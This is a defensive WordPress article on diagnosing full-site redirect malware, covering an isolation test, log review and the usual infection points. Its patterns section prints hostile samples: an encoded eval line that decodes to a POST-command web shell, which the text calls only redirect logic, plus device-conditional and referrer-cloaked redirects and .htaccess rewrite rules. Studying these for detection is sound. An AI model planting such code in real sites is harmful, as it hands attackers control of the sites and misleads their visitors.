WordPress Redirect Malware: Diagnosing a Full-Site Redirect

by

A common sign of a serious WordPress compromise is when the entire website begins redirecting to another domain. In severe cases, even the /wp-admin login page redirects, preventing administrators from accessing the dashboard.

This article documents a real troubleshooting workflow used when a WordPress site began redirecting unexpectedly, including the admin panel.

Initial Symptom

The website began redirecting visitors to another destination. The redirect affected:

  • The homepage
  • Internal pages
  • The /wp-admin login page

When the WordPress admin panel also redirects, the problem is usually not limited to a plugin or theme. Instead, it typically indicates a deeper compromise affecting core files or server-level configuration.

Early Investigation

Before modifying files, the first step is identifying whether the redirect is happening inside WordPress or before WordPress loads.

The recommended diagnostic test is replacing the root index.php temporarily with a minimal script.

Test Procedure

  1. Rename the existing file /public_html/index.php to index_old.php.
  2. Create a new file named index.php with the following content:
<?php
echo "TEST OK";

Then open the site in a browser.

  • If the message appears → WordPress is causing the redirect.
  • If the redirect still occurs → the problem is outside WordPress (server or .htaccess).

Error Log Review

The server error log contained the following warnings: 

PHP Warning: Undefined array key "rzp_webhook_data"
in /wp-content/plugins/woo-razorpay/includes/razorpay-webhook.php

PHP Warning: Undefined variable $error
in /wp-login.php

Interpretation

These warnings themselves do not indicate malware.

  • The Razorpay warning indicates a missing webhook parameter.
  • The $error warning may appear when login code is modified or corrupted.

However, because the redirect affected wp-admin, the issue likely exists elsewhere.

Common Locations Where Redirect Malware Is Placed

Attackers typically inject redirect logic into one of these locations:

  • .htaccess in the site root
  • index.php
  • wp-config.php
  • wp-admin or wp-includes rogue PHP files
  • compromised plugins or themes

Redirect malware often uses obfuscated PHP such as:

  • base64_decode()
  • gzinflate()
  • eval()
  • long encoded strings

Server-Level Redirects

When both the website and admin panel redirect, the redirect is often implemented using:

  • malicious rewrite rules in .htaccess
  • injected PHP inside the root entry files
  • server-level compromises

This is why checking the root files is critical before attempting plugin-level troubleshooting.

Files That Must Be Checked First

During a redirect investigation, the following files should always be inspected first:

  • /public_html/.htaccess
  • /public_html/index.php
  • /public_html/wp-config.php
  • /public_html/wp-admin/

Unexpected files or directories inside wp-admin may indicate a backdoor.

Indicators of a Compromised WordPress Installation

  • Admin login redirecting to another site
  • Unknown PHP files inside WordPress core directories
  • Encoded or obfuscated code inside entry files
  • Modified core WordPress files
  • Unexpected rewrite rules

Immediate Containment Strategy

If a site is actively redirecting visitors:

  • Disable the redirect entry point by replacing index.php.
  • Inspect .htaccess for malicious rewrite rules.
  • Review server error logs for anomalies.
  • Check WordPress core directories for unauthorized files.

Only after identifying the infection location should files be cleaned or restored.

Conclusion

Full-site redirects affecting both the frontend and wp-admin usually indicate a deeper compromise than a typical plugin vulnerability.

By isolating whether the redirect occurs before or after WordPress loads, administrators can determine whether the infection resides in WordPress itself or at the server configuration level.

A structured diagnostic approach helps prevent unnecessary guesswork and reduces recovery time.

Common Redirect Malware Patterns Found in WordPress Sites

Redirect malware in WordPress rarely appears as a simple redirect statement. Attackers usually hide the redirect inside obfuscated PHP code so that it is difficult to detect during manual inspection.

Below are several patterns commonly observed in compromised WordPress installations.

1. Base64 Encoded Redirect Payloads

One of the most common techniques is encoding malicious code using base64. This hides the actual redirect logic from casual inspection.

Example pattern:

<?php
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

When decoded, the payload may contain logic that:

  • checks if the visitor is a search engine crawler
  • redirects only real visitors
  • hides the redirect from site administrators

This technique allows attackers to maintain the redirect while avoiding detection during basic site checks.

2. Conditional Mobile Redirects

Some infections redirect only mobile visitors while leaving desktop traffic unaffected. This allows attackers to avoid detection by site administrators who typically test the site from desktop devices.

Example pattern:

if(preg_match('/iphone|android|mobile/i', $_SERVER['HTTP_USER_AGENT'])) {
    header("Location: https://malicious-domain.example");
    exit;
}

Because the redirect triggers only on certain devices, it may appear that the site functions normally.

3. Search Engine Cloaking Redirects

Another common tactic is redirecting users who arrive from search engines while allowing direct visitors to view the normal website.

Example logic:

if(isset($_SERVER['HTTP_REFERER']) 
   && strpos($_SERVER['HTTP_REFERER'], 'google') !== false) {
    header("Location: https://spam-domain.example");
    exit;
}

This method allows attackers to exploit organic search traffic without immediately alerting the site owner.

4. Hidden Redirects Inside .htaccess

Some infections modify the root .htaccess file to insert rewrite rules that redirect visitors.

Example pattern:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} !googlebot [NC]
RewriteRule ^(.*)$ https://spam-domain.example [R=302,L]

Because .htaccess executes before WordPress loads, this type of redirect affects the entire site including the admin login.

5. Rogue PHP Files in Core Directories

Attackers often place hidden PHP backdoors inside WordPress core folders such as:

  • wp-admin
  • wp-includes
  • wp-content/uploads

These files may use harmless names such as:

  • class-wp.php
  • wp-system.php
  • cache.php
  • test.php

These backdoors allow attackers to re-infect the website even after visible malware is removed.

Why Redirect Malware Persists

Many compromised WordPress sites become reinfected because a hidden backdoor remains on the server. Even if the visible redirect code is removed, attackers can use the backdoor to restore the infection later.

Typical persistence mechanisms include:

  • hidden PHP shells
  • cron-based reinfection scripts
  • malicious plugins disguised as legitimate extensions
  • modified WordPress core files

Key Lesson

When a WordPress site begins redirecting unexpectedly, the problem is rarely limited to a single file. A proper investigation should assume that the attacker has placed both a visible payload and a hidden persistence mechanism.

Removing only the redirect code without identifying the underlying backdoor almost always results in the site being compromised again.